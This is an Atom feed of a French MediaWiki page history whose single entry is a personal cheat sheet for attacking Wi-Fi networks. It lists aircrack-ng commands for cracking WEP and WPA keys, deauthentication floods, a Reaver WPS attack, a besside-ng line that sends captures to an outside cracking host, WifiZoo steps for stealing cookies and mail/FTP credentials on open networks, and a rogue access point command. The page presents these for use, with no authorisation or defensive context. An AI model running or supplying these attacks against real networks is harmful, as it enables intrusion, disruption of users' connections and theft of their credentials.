<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="fr">
	<id>https://futex.re/mediawiki/index.php?action=history&amp;feed=atom&amp;title=Wifi</id>
	<title>Wifi - Historique des versions</title>
	<link rel="self" type="application/atom+xml" href="https://futex.re/mediawiki/index.php?action=history&amp;feed=atom&amp;title=Wifi"/>
	<link rel="alternate" type="text/html" href="https://futex.re/mediawiki/index.php?title=Wifi&amp;action=history"/>
	<updated>2026-04-07T13:33:44Z</updated>
	<subtitle>Historique des versions pour cette page sur le wiki</subtitle>
	<generator>MediaWiki 1.39.17</generator>
	<entry>
		<id>https://futex.re/mediawiki/index.php?title=Wifi&amp;diff=1567&amp;oldid=prev</id>
		<title>Futex le 14 juin 2012 à 19:15</title>
		<link rel="alternate" type="text/html" href="https://futex.re/mediawiki/index.php?title=Wifi&amp;diff=1567&amp;oldid=prev"/>
		<updated>2012-06-14T19:15:27Z</updated>

		<summary type="html">&lt;p&gt;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Nouvelle page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;Tester si le driver de la carte wifi supporte l&amp;#039;injection de packets&lt;br /&gt;
&lt;br /&gt;
  #aireplay-ng -9 mon0&lt;br /&gt;
  21:15:52  Trying broadcast probe requests...&lt;br /&gt;
  21:15:52  Injection is working!&lt;br /&gt;
  21:15:53  Found 4 APs&lt;br /&gt;
&lt;br /&gt;
== AirCrack - WEP ==&lt;br /&gt;
Dans un terminal:&lt;br /&gt;
  Airmon-ng start [interface]&lt;br /&gt;
  Airodump-ng [interface]&lt;br /&gt;
  Airodump-ng --channel [channel cible] --write wep --bssid [BSSID cible] [interface] **Attention la commande tourné&lt;br /&gt;
 &lt;br /&gt;
Dan un nouveau terminal:&lt;br /&gt;
  Aireplay-ng -1 0 -a [BSSID cible] [interface]&lt;br /&gt;
  Attention wait for the recognize router :-) &lt;br /&gt;
 &lt;br /&gt;
Dans un nouveau terminal:&lt;br /&gt;
  Aireplay-ng -3 -b [BSSID cible] [interface]&lt;br /&gt;
               **Attention not close this terminal **                             &lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
Dans un nouveau terminal:&lt;br /&gt;
  Aircrack-ng wep-01.cap&lt;br /&gt;
&lt;br /&gt;
== AirCrack - WPA ==&lt;br /&gt;
&lt;br /&gt;
Passer la carte wifi en mode monitor (créee une nouvelle interface mon0)  &lt;br /&gt;
  #airmon-ng start wlan0&lt;br /&gt;
&lt;br /&gt;
Ecouter le réseau en mode WPA&lt;br /&gt;
  #airodump-ng --encrypt wpa mon0&lt;br /&gt;
&lt;br /&gt;
Cibler un SSID précis (-c channel d&amp;#039;écoute, --bssid le point d&amp;#039;accès, -w fichier de sortie, --ignore-negative-one à utiliser sur toutes les commandes en cas du bug airodump channel: -1)&lt;br /&gt;
  #airodump-ng -w out --encrypt wpa -c 1 --bssid 00:1F:9F:BB:AF:05 --ignore-negative-one mon0&lt;br /&gt;
&lt;br /&gt;
Pour réussir un crack wpa, il est primordial qu&amp;#039;une station soit connectée, en effet le 4 way handshake (littéralement la poignée de mains) nécessaire au crack ne peut etre capturé QUE si une station est connectée au point d&amp;#039;accès.&lt;br /&gt;
&lt;br /&gt;
Préparez votre attaque aireplay-ng. Ouvrir deux nouveaux shells.&lt;br /&gt;
Dans le premier, préparez la commande &lt;br /&gt;
  #aireplay-ng -0 0 -a $bssid -c $station --ignore-negative-one mon0&lt;br /&gt;
Dans le second, préparez la commande &lt;br /&gt;
  #aireplay-ng -0 0 -a $bssid --ignore-negative-one mon0&lt;br /&gt;
&lt;br /&gt;
Le paramètre -0 signifie une attaque déauth, le 0 qui suit signifie que l&amp;#039;envoi des paquets de déauth sera infini, il faudra donc arrêter l&amp;#039;attaque après quelques instants avec ctrl + c. Vous pouvez spécifier un délai, par exemple aireplay-ng -0 5 , et l&amp;#039;attaque s&amp;#039;arrêtera après l&amp;#039;envoi de 5 paquets de déauth. Quand les commandes sont prêtes, lancez les dans chaque shell, patientez quelques secondes et stoppez les.&lt;br /&gt;
&lt;br /&gt;
Si l&amp;#039;attaque a réussi, vous devriez avoir une bonne surprise en revenant dans votre shell airodump-ng. L&amp;#039;apparition du WPA handshake en haut à droite de la fenetre indique la réussite de l&amp;#039;attaque. Cela varie suivant la qualité du signal reçu.&lt;br /&gt;
&lt;br /&gt;
Le handshake est maintenant dans le fichier de capture, vous pouvez stopper airodump. Vous devez maintenant vous armer d&amp;#039;un bon fichier dictionnaire. Le crack peut commencer:&lt;br /&gt;
  #aircrack-ng -w nom-du-fichier-dictionnaire nom-du-fichier-de-capture&lt;br /&gt;
&lt;br /&gt;
&amp;quot;-w -&amp;quot; si on n&amp;#039;a pas de dictionnaire&lt;br /&gt;
&lt;br /&gt;
== AirCrack - Divers ==&lt;br /&gt;
&lt;br /&gt;
Attaquer un réseau Wifi et cracker la clef online&lt;br /&gt;
  besside-ng -s wpa.darkircop.org mon0&lt;br /&gt;
&lt;br /&gt;
== Reaver ==&lt;br /&gt;
&lt;br /&gt;
  #reaver -i mon0 -b ${BSSID} -vv&lt;br /&gt;
&lt;br /&gt;
== WifiZoo ==&lt;br /&gt;
&lt;br /&gt;
Télécharger [http://community.corest.com/~hochoa/wifizoo/index.html ici]&lt;br /&gt;
&lt;br /&gt;
WifiZoo est un outil permettant de récupérer des cookies sur des réseaux wifi non encryptés (opn), ainsi que diverses autres informations intéressantes: POP3 Credentials, FTP Datas, MSN Datas, SMTP Datas. Le résultat du sniffing d&amp;#039;informations est affiché sur une interface web. La réutilisation des cookies est d&amp;#039;une facilité déconcertante, puisque Wifizoo intègre un serveur proxy spécialement dédié à la réutilisation des cookies que le programme va lui meme forger automatiquement.&lt;br /&gt;
&lt;br /&gt;
Penser à modifier le fichier wifizoo.py est changer la variable &amp;quot;conf.iface = &amp;#039;wlan0&amp;#039;&amp;quot; par sa carte wifi.&lt;br /&gt;
&lt;br /&gt;
Lancer wifizoo:&lt;br /&gt;
  #python wifizoo.py -i wlan0&lt;br /&gt;
&lt;br /&gt;
On peut voir que wifizoo lance l&amp;#039;interface web sur le port 8000 du serveur local, et le proxy est accessible sur le port 8080. S&amp;#039;y connecter avec firefox: 127.0.0.1:8000&lt;br /&gt;
Puis clic-clic bouton pour voler les cookies :)&lt;br /&gt;
&lt;br /&gt;
== Créer un faux point d&amp;#039;accès ==&lt;br /&gt;
&lt;br /&gt;
  airbase-ng -c &amp;quot;${WIFI_CHANNEL}&amp;quot; -e &amp;quot;${ESSID_NAME}&amp;quot; &amp;quot;${WNIC_NAME}&amp;quot;&lt;/div&gt;</summary>
		<author><name>Futex</name></author>
	</entry>
</feed>